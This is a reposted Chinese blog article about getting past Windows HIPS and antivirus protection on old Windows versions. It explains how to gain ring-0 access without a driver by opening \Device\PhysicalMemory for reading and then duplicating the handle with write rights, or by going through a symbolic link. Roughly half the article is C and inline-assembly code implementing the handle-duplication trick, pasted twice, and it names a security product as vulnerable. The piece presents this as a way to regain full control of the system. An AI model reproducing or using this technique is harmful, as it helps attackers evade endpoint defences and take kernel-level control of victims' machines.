【转】突破HIPS的防御思路之duplicate physical memory
2009-08-09 15:38
330 查看
众所周知,WINDOWS 2000/XP/2003 SP0系统上,提供了一个\Device\PhysicalMemory的Section对象,可以直接操作物理内存对象。直接操作此对象映射的物理内存,可以操作RING0内存,达到无驱进入RING0的目的。 这已是很多年前就被用烂了的技术了,大部分驱动防火墙、绝大部分HIPS软件、AntiVirus软件等都对此进行了防御。不过,老树也能开新花,我们来看看这个东东的新利用方法: 1).CreateSymbolicLink,这也是很古老的方法,很多安全软件也已经防御。因为一些安全软件只防御了NtOpenSection,并根据打开的对象名是否是\Device\PhysicalMemory来进行拦截,但是只要对\Device\PhysicalMemory创建符号链接,那么一样可以使用NtOpenSection打开 2).Duplicate法,大部分目前的安全软件,都是拦截\Device\PhysicalMemory并判断DesiredAccess是否包含SECTION_MAP_WRITE(除了一些极端无聊的没人用的HIPS外,这种的完全可以无视), 因为一些正常的软件,也需要打开\Device\PhysicalMemory进行物理内存读入(例如微软Wga~)。 但这就让攻击者有空可钻,攻击者可以先以SECTION_MAP_READ打开物理内存对象,再以SECTION_MAP_WRITE方式duplicate handle,这样就可以获取对物理内存的写权限,进行物理内存写入了。大部分安全软件都没有防御这种方式(例如瑞*),这样,攻击者又重新获得了对于系统至高无上的权利~ 示例代码: UNICODE_STRING uniname ;
OBJECT_ATTRIBUTES oba ; HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwOpenSection");
uniname.Buffer = (PWSTR)phyname;
uniname.Length = sizeof(phyname) - sizeof(WCHAR);
uniname.MaximumLength = sizeof(uniname);
HANDLE handle ;
LONG stat ;
InitializeObjectAttributes(&oba , &uniname , 0x40 , 0 , 0 );
__asm{
lea eax , oba
push eax
push 4
lea eax , handle
push eax
call p
mov stat , eax
}
printf("stat 1 %08x\n" , stat);
HANDLE xhandle ;
BOOL bret = DuplicateHandle(GetCurrentProcess() , handle,GetCurrentProcess() , &xhandle , SECTION_MAP_WRITE | SECTION_MAP_READ , FALSE , DUPLICATE_CLOSE_SOURCE);
OBJECT_ATTRIBUTES oba ; HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwOpenSection");
uniname.Buffer = (PWSTR)phyname;
uniname.Length = sizeof(phyname) - sizeof(WCHAR);
uniname.MaximumLength = sizeof(uniname);
HANDLE handle ;
LONG stat ;
InitializeObjectAttributes(&oba , &uniname , 0x40 , 0 , 0 );
__asm{
lea eax , oba
push eax
push 4
lea eax , handle
push eax
call p
mov stat , eax
}
printf("stat 1 %08x\n" , stat);
HANDLE xhandle ;
BOOL bret = DuplicateHandle(GetCurrentProcess() , handle,GetCurrentProcess() , &xhandle , SECTION_MAP_WRITE | SECTION_MAP_READ , FALSE , DUPLICATE_CLOSE_SOURCE);
相关文章推荐
- 突破HIPS的防御思路之duplicate physical memory
- 突破HIPS的防御思路之duplicate physical memory
- Physical Address Extension - PAE Memory and Windows
- 京东资深架构师:高性能高并发服务的瓶颈及突破思路
- MDB: virtual and physical memory map for both kernel and application
- hadoop job报错is running beyond physical memory limits
- running beyond virtual/physical memory limits问题解决
- 突破路由mac地址过滤思路
- babyos2(11)—— physical memory manage, buddy system
- running beyond physical memory limits
- 通过 WMI 获取远程机器 TotalPhysicalMemory(物理内存)
- LeetCode解题思路之Remove Duplicates from Sorted Array
- sing NAGIOS to Check the Physical Memory Available on a Windows Host
- [VMware]关于VMware出现Not enough physical memory is available to power on this virtual machine
- How to create physical standby database with 11g RMAN DUPLICATE FROM ACTIVE DATABASE [ID 747250.1]
- Read physical memory information from registry
- Retrieving MmPhysicalMemoryBlock regardless of the NT version.
- Access Physical Memory, Port and PCI Configuration Space
- ORA-01034 Oracle not available和ORA-27101 shared memory realm does not exist 解决思路
- Extended paging tables to map guest physical memory addresses from virtual memory page tables to host physical memory addresses in a virtual machine system